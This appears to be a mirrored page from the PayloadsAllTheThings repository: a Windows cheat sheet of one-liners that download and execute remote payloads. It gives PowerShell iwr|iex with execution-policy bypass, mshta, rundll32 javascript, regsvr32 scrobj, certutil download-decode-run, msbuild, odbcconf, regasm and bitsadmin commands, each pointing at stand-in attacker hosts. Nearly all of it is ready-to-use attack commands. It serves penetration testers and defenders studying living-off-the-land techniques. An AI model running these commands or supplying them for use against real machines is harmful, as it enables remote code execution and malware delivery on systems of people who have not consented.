mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-18 17:28:49 +00:00
107 lines
2.6 KiB
Markdown
107 lines
2.6 KiB
Markdown
# Windows - Download and execute methods
|
|
|
|
## Downloaded files location
|
|
|
|
- C:\Users\<username>\AppData\Local\Microsoft\Windows\Temporary Internet Files\
|
|
- C:\Users\<username>\AppData\Local\Microsoft\Windows\INetCache\IE\<subdir>
|
|
- C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV
|
|
|
|
## Powershell
|
|
|
|
From an HTTP server
|
|
|
|
```powershell
|
|
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex"
|
|
```
|
|
|
|
From a Webdav server
|
|
|
|
```powershell
|
|
powershell -exec bypass -f \\webdavserver\folder\payload.ps1
|
|
```
|
|
|
|
## Cmd
|
|
|
|
```powershell
|
|
cmd.exe /k < \\webdavserver\folder\batchfile.txt
|
|
```
|
|
|
|
## Cscript / Wscript
|
|
|
|
```powershell
|
|
cscript //E:jscript \\webdavserver\folder\payload.txt
|
|
```
|
|
|
|
## Mshta
|
|
|
|
```powershell
|
|
mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
|
|
```
|
|
|
|
```powershell
|
|
mshta http://webserver/payload.hta
|
|
```
|
|
|
|
```powershell
|
|
mshta \\webdavserver\folder\payload.hta
|
|
```
|
|
|
|
## Rundll32
|
|
|
|
```powershell
|
|
rundll32 \\webdavserver\folder\payload.dll,entrypoint
|
|
```
|
|
|
|
```powershell
|
|
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();
|
|
```
|
|
|
|
## Regasm / Regsvc @subTee
|
|
|
|
```powershell
|
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll
|
|
```
|
|
|
|
## Regsvr32 @subTee
|
|
|
|
```powershell
|
|
regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
|
|
```
|
|
|
|
```powershell
|
|
regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll
|
|
```
|
|
|
|
## Odbcconf
|
|
|
|
```powershell
|
|
odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}
|
|
```
|
|
|
|
## Msbuild
|
|
|
|
```powershell
|
|
cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"
|
|
```
|
|
|
|
## Certutil
|
|
|
|
```powershell
|
|
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
|
|
```
|
|
|
|
```powershell
|
|
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe
|
|
```
|
|
|
|
## Bitsadmin
|
|
|
|
```powershell
|
|
bitsadmin /transfer mydownloadjob /download /priority normal http://<attackerIP>/xyz.exe C:\\Users\\%USERNAME%\\AppData\\local\\temp\\xyz.exe
|
|
```
|
|
|
|
|
|
## References
|
|
|
|
- [arno0x0x - Windows oneliners to download remote payload and execute arbitrary code](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
|